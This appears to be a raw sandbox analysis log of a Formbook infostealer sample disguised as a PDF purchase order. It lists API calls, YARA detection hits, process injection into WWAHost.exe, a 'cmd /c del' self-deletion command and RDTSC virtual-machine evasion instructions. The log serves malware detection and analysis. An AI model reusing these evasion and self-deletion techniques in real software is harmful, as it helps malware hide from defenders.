          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036596D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03659540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03659910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036595D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03659860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03659840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03659760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03659770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0365A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03659730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03659B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0365A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036597A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0365A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03659670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03659A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03659A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03659610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03659A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03659A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03659560 NtWriteFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03659950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03659520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0365AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036595F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036599D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0365B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03659820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036598F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036598A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_028982F0 NtClose,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_02898270 NtReadFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_028983A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_028981C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_028982EA NtClose,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0289826B NtReadFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0289839C NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_028981BA NtCreateFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0289817B NtCreateFile,
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeCode function: 2_2_00401030
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeCode function: 2_2_004012FB
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeCode function: 2_2_0041BB8C
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeCode function: 2_2_0041CBB7
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeCode function: 2_2_00408C60
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeCode function: 2_2_00402D88
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeCode function: 2_2_00402D90
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeCode function: 2_2_0041B6EB
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeCode function: 2_2_00402FB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036E2B28
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036E1FF1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036DDBD2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0364EBB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03636E30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036E2EF7
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036E22AE
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036E1D55
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03610D20
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03634120
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0361F900
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036E2D07
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0362D5E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036E25DD
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03642581
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036DD466
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036D1002
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0362841F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036E28EC
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036420A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036E20A8
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0362B090
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0289CBB7
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0289B6EB
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_02882FB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_02888C60
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_02882D88
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_02882D90
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 0361B150 appears 35 times
          Source: Nouveau bon de commande. 3007021_pdf.exe, 00000000.00000000.201502923.00000000005E2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTRACEENABLEIN.exe: vs Nouveau bon de commande. 3007021_pdf.exe
          Source: Nouveau bon de commande. 3007021_pdf.exeBinary or memory string: OriginalFilename vs Nouveau bon de commande. 3007021_pdf.exe
          Source: Nouveau bon de commande. 3007021_pdf.exe, 00000002.00000002.294055772.0000000001ED6000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWWAHost.exej% vs Nouveau bon de commande. 3007021_pdf.exe
          Source: Nouveau bon de commande. 3007021_pdf.exe, 00000002.00000002.291591359.0000000000F92000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTRACEENABLEIN.exe: vs Nouveau bon de commande. 3007021_pdf.exe
          Source: Nouveau bon de commande. 3007021_pdf.exe, 00000002.00000002.292904199.0000000001BDF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Nouveau bon de commande. 3007021_pdf.exe
          Source: Nouveau bon de commande. 3007021_pdf.exeBinary or memory string: OriginalFilenameTRACEENABLEIN.exe: vs Nouveau bon de commande. 3007021_pdf.exe
          Source: Nouveau bon de commande. 3007021_pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.293883850.0000000001DF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.293883850.0000000001DF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.472762051.0000000002A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.472762051.0000000002A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.472841788.0000000002AC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.472841788.0000000002AC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.292188314.0000000001660000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.292188314.0000000001660000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Nouveau bon de commande. 3007021_pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Nouveau bon de commande. 3007021_pdf.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@12/4
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Nouveau bon de commande. 3007021_pdf.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3468:120:WilError_01
          Source: Nouveau bon de commande. 3007021_pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Nouveau bon de commande. 3007021_pdf.exeVirustotal: Detection: 60%
          Source: Nouveau bon de commande. 3007021_pdf.exeMetadefender: Detection: 34%
          Source: Nouveau bon de commande. 3007021_pdf.exeReversingLabs: Detection: 82%
          Source: unknownProcess created: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe 'C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe'
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess created: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess created: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe'
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Nouveau bon de commande. 3007021_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Nouveau bon de commande. 3007021_pdf.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: Nouveau bon de commande. 3007021_pdf.exeStatic file information: File size 1327104 > 1048576
          Source: Nouveau bon de commande. 3007021_pdf.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x143600
          Source: Nouveau bon de commande. 3007021_pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: WWAHost.pdb source: Nouveau bon de commande. 3007021_pdf.exe, 00000002.00000002.293934813.0000000001E20000.00000040.00000001.sdmp
          Source: Binary string: WWAHost.pdbUGP source: Nouveau bon de commande. 3007021_pdf.exe, 00000002.00000002.293934813.0000000001E20000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Nouveau bon de commande. 3007021_pdf.exe, 00000002.00000002.292665175.0000000001AC0000.00000040.00000001.sdmp, WWAHost.exe, 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Nouveau bon de commande. 3007021_pdf.exe, 00000002.00000002.292665175.0000000001AC0000.00000040.00000001.sdmp, WWAHost.exe
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeCode function: 2_2_0041C9C6 push es; ret
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeCode function: 2_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeCode function: 2_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeCode function: 2_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeCode function: 2_2_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeCode function: 2_2_0041CF8E pushfd ; iretd
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0366D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0289B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0289C9C6 push es; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0289CF8E pushfd ; iretd
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0289BF5B push cs; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0289B40B push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0289B402 push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0289B46C push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.77818810762
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 00000000028885E4 second address: 00000000028885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 000000000288897E second address: 0000000002888984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeCode function: 2_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe TID: 672Thread sleep time: -40528s >= -30000s
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe TID: 3412Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5308Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\SysWOW64\WWAHost.exe TID: 1532Thread sleep time: -34000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\WWAHost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeThread delayed: delay time: 40528
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000003.00000000.260902684.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.260902684.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000003.00000000.261202589.00000000088BF000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.260714428.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.259157463.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.280678597.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000003.00000000.260902684.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000003.00000000.260902684.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.261014037.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000003.00000000.280797012.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
